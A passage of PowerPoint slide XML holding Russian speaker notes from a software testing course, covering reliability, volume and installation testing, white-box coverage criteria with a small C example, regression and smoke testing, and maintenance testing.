              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>maturity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>), которая является обратной величиной к частоте отказов, и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>устойчивость к отказам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>fault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>tolerance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>), то есть способность системы не реагировать на какие-то внутренние проблемы. В том числе сюда относится транзакционная целостность и способность к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>восстановлению работоспособности при отказах</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>recoverability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>). То есть если у вас сервер упал, то он должен самостоятельно восстановиться, вернуть все нужные данные, ничего не потерять, и продолжить работу.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Volume testing (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>тестирование вместимости</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> – тестирование, направленное на определения объема</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> данных, которые может обрабатывать система </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>и\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> или объем данных, которые могут находиться в базе данных и т.д.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Установочное тестирование – процесс тестирования на определение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>устанавливаемости</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> системы.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Конфигурационное тестирование – см. Тестирование переносимости.</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https://ru.wikipedia.org/wiki/%D0%A1%D1%82%D1%80%D0%B0%D1%82%D0%B5%D0%B3%D0%B8%D1%8F_%D1%82%D0%B5%D1%81%D1%82%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F_%D0%BF%D0%BE_%D0%BF%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF%D1%83_%C2%AB%D0%91%D0%B5%D0%BB%D0%BE%D0%B3%D0%BE_%D1%8F%D1%89%D0%B8%D0%BA%D0%B0%C2%BB</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Структурное тестирование (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>тестирование</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> методом белого ящика) может выполняться на всех уровнях тестирования. Структурные методы тестирования лучше всего использовать после методов разработки тестов на основе спецификации, чтобы измерить тщательность тестирования, используя измерения покрытия структуры программы. Покрытие – это часть структуры программы, которая была охвачена тестированием, выраженная в процентах. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Если покрытие не равно 100%, то необходимо разрабатывать дополнительные тесты для покрытия пропущенных участков программы.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>На всех уровнях тестирования могут использоваться инструментальные средства для измерения покрытия кода.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Техника Белого ящика включает в себя следующие методы определения покрытия:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> п</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>окрытие операторов</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> покрытие решений</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> покрытие условий</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> комбинаторное покрытие условий</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>Покрытия операторов </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>подразумевает </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t>выполнение каждого оператора</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> программы по крайней мере один раз.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Рассмотрим пример:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>float</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> &gt; 1) &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> == 0)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> == 2 || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> &gt; 1) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>x++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Чтобы выполнить каждый оператор не менее одного раза, нужно составить единственный тест со следующими значениями входных данных (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = 3).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Данный подход обладает недостатками. Вот, например, если в условии </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3" tooltip="Программист"/>
              </a:rPr>
              <a:t>программист</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> допускает ошибку и пишет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> 1 или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt; -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> 1, то с помощью нашего теста эта ошибка не будет обнаружена.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>покрытия методом решений </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>необходимо составить такое число тестов, при которых каждое условие в программе примет как истинное значение, так и ложное значение.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> b = 0, x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>4 (условие </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> &gt; 1) &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> == 0)) будет истинно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истинно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>И </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>0 (условие </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> &gt; 1) &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> == 0)) будет ложно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ложно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Если программист ошибется в условии </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>a==2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, то с помощью наших тестов ошибка опять же не будет обнаружена.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>покрытия условий</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, все условия (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>a&gt;1, b==0, a==2, x&gt;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>должны принимать и ложное, и истинное значения.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>a=2,  b=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, x=2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a=0,  b=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, x=0</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При таком подходе, некоторые операторы могут не выполниться ни разу. Для более полного теста необходимо добавлять, что все операторы должны выполниться хотя бы один раз (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>комбинаторное покрытие условий</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После того, как дефект обнаружен и исправлен, программу необходимо перепроверить, чтобы убедиться, что исходный дефект успешно устранен. Это называется подтверждением. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Отладка (локализация и исправление дефекта) относится к процессу разработки, а не тестирования. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Регрессионное тестирование – это повторное тестирование уже протестированных программ после внесения в них изменений, чтобы обнаружить дефекты, внесенные или пропущенные  в результате этих действий. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Эти дефекты могут быть как в проверяемом компоненте, так и в связанном или несвязанным с ним. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Регрессионное тестирование выполняется, когда в программное обеспечение или его окружение вносятся изменения. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Глубина регрессионного тестирования оценивается риском пропуска  дефектов в программном обеспечении, которое работало ранее.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тесты должны быть повторяемыми, если они должны использоваться для подтверждающего или регрессионного тестирования. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Регрессионное тестирование может выполняться на всех уровнях тестирования и включает функциональное, нефункциональное и структурное тестирование. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Регрессионные наборы тестов запускаются множество раз и меняются медленно, поэтому регрессионное тестирование является хорошим кандидатом на автоматизацию.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Разновидности</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> регрессионного тестирования:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>	Дымовое тестирование – поверхностная проверка того, что основные функции системы работают. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>	Санитарное тестирование – проверка того, что какая-либо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> функция системы работает как следует.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	Регрессионное тестирование по дефектам, которые были исправлены в тестируемой версии ПО</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	Регрессионное тестирование по дефектам, которые были исправлены в предыдущих версиях ПО</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	Тестирование побочного эффекта – проверка того, что исправление ошибок в определенной функциональности не повлекло за собой новых ошибок в работе данной функциональности.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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После установки система программного обеспечения обычно находится в эксплуатации в течение многих лет. В это время сама система, ее конфигурация или среда исполнения часто изменяются или расширяются. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование в период сопровождения выполняется на текущей ОС и может быть вызвано модификацией, переносом или прекращение эксплуатации данной системы. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>В зависимости от вносимых изменений, тестирование в период сопровождения может проводиться на любом из уровней или видов тестирования. Определение, каким образом внесенные изменения могут повлиять на систему, называется анализом влияния (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>impact analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) и используется при определении объема регрессионных тестов.  </a:t>
            </a:r>
